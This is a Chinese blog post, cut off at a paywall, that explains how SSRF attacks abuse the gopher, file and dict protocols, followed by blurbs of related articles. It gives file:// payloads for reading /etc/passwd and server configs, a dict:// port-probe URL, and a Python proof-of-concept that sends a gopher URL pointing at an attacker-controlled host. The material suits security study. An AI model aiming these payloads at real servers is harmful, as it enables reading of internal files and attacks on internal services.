SSRF攻击与Gopher协议

原创 已于 2023-06-05 17:34:55 修改 · 2.5k 阅读 · 43 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2023-06-04 16:44:37 首次发布
文章介绍了Gopher协议的历史及其在SSRF攻击中的应用,包括利用Gopher协议攻击Redis,写入定时任务和数据流构造。同时提到了file和dict协议,分别用于读取本地文件和探测内网服务,dict协议还能用于Redis命令执行。Gopherus工具用于自动化生成payload,简化攻击过程。

目录

Gopher协议简介

SSRF攻击中常用协议

file协议

dict协议

gopher协议

Gopher攻击Redis

使用gopher协议写入定时任务

 Gopherus工具构造gopher协议数据流

Gopher协议简介

Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;

gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求,gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)

SSRF攻击中常用协议

file协议

file协议主要用于读取服务器本地文件,访问本地的静态资源

file协议数据格式:

file://文件绝对路径名

例如:

file:///etc/passwd
file:///var/www/html/index.php
file:///usr/local/apache-tomcat/conf/server.xml

dict协议

dict协议一般常用来探测内网主机以及端口开放情况,既然能够探测端口,那么可以探测不同端口对应的服务的指纹信息。当然dict协议也可以用来执行一些服务的命令,如redis

  • 内网主机探测
最低0.47元/天 解锁文章
【网络安全 | HTTP】 gopher协议原理、语法及利用总结
等风来
08-01 1万+
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
ssrf之dict协议和file协议
qq_59020256的博客
12-29 1932
1.dict协议 dict是什么协议呢? 定义:词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端在使 用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628。 官方介绍:http://dict.org/rfc2229.txt 利用dict协议可以探测出目标端口的指纹信息,进一步方便我们利用。 localhost2:8181/ssrf/ssrf1.php?url=dict://172.16.129.33:3306 2.fil
Web攻防—SSRF服务端请求伪造&Gopher协议&无回显利用
2301_76227305的博客
04-12 1733
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正补充,有兴趣的师傅可以一起交流学习。
SSRF利用协议中的万金油——Gopher
qq_50854662的博客
02-23 8281
SSRF利用协议中的万金油——Gopher
基础知识《DICT协议
qq_46143339的博客
03-14 817
DICT(词典网络协议)是一种基于TCP的应用层协议,设计用于通过客户端-服务器模式高效检索字典数据。其核心目标是提供比传统协议(如Webster protocol)更灵活的数据访问方式。对用户输入的特殊字符(如空格、换行符)进行转义或过滤,防止命令注入。表示成功检索定义),后跟具体数据。:Redis未设置密码认证。服务器响应以状态码开头(如。(列出可用数据库)等。
SSRF-gopher 协议扩展利用:突破网络限制的利器
weixin_43822401的博客
06-11 1122
Gopher 是一种在 HTTP 协议之前非常流行的信息查找系统,虽然现在已经被 HTTP 协议取代,但在 SSRF 漏洞利用中仍然发挥着重要作用。Gopher 协议可以将 HTTP 请求转换为 TCP 数据流,从而突破一些网络限制,例如防火墙。Gopher 协议作为 SSRF 漏洞利用的利器,可以帮助攻击者突破网络限制,实现更高级的攻击目标。为了防止 SSRF-gopher 协议漏洞,需要对用户输入进行严格的校验,并使用安全的编码和解码库。
SSRFGOPHER协议利用
qq_61553520的博客
05-22 1105
GOPHER协议是一种比HTTP协议还要古老的协议,默认工作端口70,但是gopher协议SSRF漏洞利用上比HTTP协议更有优势。
SSRF服务端请求&Gopher协议&白盒测试
2301_81155391的博客
12-29 1486
是什么SSRF?这个简单点说就是 服务端的请求伪造 就是这个如果是个 请求图片的网站 他的目的是请求外部其他网站的 图片 但是 SSRF指的是让他请求本地的图片 再展示出来 请求的是他的服务器上的图片SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到它相连而外网隔离的内部系统)
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 6483
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3632
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
SSRF漏洞-Gopher协议扩展利用
小刚的博客
08-20 2850
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshell Gopher协议 Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它 但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛 利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击, 并可以构造发送GET,POST.
gopher协议ssrf
UserNick157的博客
08-24 1398
gopher curl ssrf
gopher协议
qq_50613938的博客
11-02 1156
gopher协议gopher协议 :互联网上使用的分布型的文件搜集获取网络协议,是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息 使用方法:gopher://ip:port/_payload Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端
SSRF4 SSRF-gopher 协议扩展利用-向内网发起 GET/POST 请求
最新发布
2401_89464052的博客
06-17 1027
Gopher协议是一种早期的信息查找系统,现常用于SSRF漏洞攻击中,可对多种服务发起攻击。其语法格式为gopher://host:port/gopher-path/,其中下划线""用于规避第一个字符被丢弃的问题。实验表明,Gopher协议可构造GET和POST请求:GET请求需对请求行和Host头进行URL编码,替换换行符为%0D%0A;POST请求则需包含5行必要配置信息,可通过Python脚本自动完成编码。通过curl命令发送构造的Gopher协议请求,可实现完整的HTTP请求模拟
WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
SuperherRo的博客
09-18 2688
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 5616
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
SSRF利用 Gopher 协议拓展攻击
热门推荐
BerL1n
11-25 1万+
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
SSRF基础:Gopher协议发送Get和Post请求
weixin_45887311的博客
07-13 6641
为了调试方便,我在win10下安装curl的工具 下载地址:https://curl.haxx.se/download.html 但目前提供的版本已经不支持gopher协议了,所以我千辛万苦找到了7.60的win64版本,支持发送gopher,dict协议 7.60地址:https://wws.lanzous.com/iaV55ekyfjc 点击即可下载 解压后把bin目录加入windows环境变量 一、什么是gopher协议? 定义:Gopher是Inter...
ssrf gopher
01-15
### 关于SSRF漏洞中的Gopher协议 在服务器端请求伪造(Server-Side Request Forgery, SSRF攻击中,利用特定协议可以扩大攻击面并提升危害程度。其中一种值得注意的是 Gopher 协议。此协议允许客户端通过简单的字符串命令来获取远程资源,在某些情况下可被恶意利用。 当应用程序未充分验证用户输入即用于发起 HTTP 请求时,则可能存在 SSRF 风险[^1]。如果目标系统支持非标准 URL 方案如 `gopher://` 并且缺乏适当过滤机制的话,那么攻击者就有可能构造特殊形式的数据包以执行任意指令或读取本地文件等内容。 对于 Jira 这样的应用而言,已知存在可以通过精心设计的 URL 来触发内部服务调用的情况,这其中包括但不限于使用 gopher 协议来进行非法操作的可能性。为了防止此类问题的发生,开发人员应当严格控制对外部网络连接的支持范围,并实施白名单策略限制可用方案种类;同时还要注意对所有来自用户的参数做全面的安全审查。 ```python import requests url = "http://example.com/vulnerable_endpoint" payload = 'gopher://attacker-controlled-site/...' response = requests.get(url, params={'param': payload}) print(response.text) ``` 上述代码片段展示了如何向易受攻击的服务发送包含有潜在危险 URI 的 GET 请求。请注意实际环境中不应如此实现,而仅作为概念证明展示可能存在的风险点。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值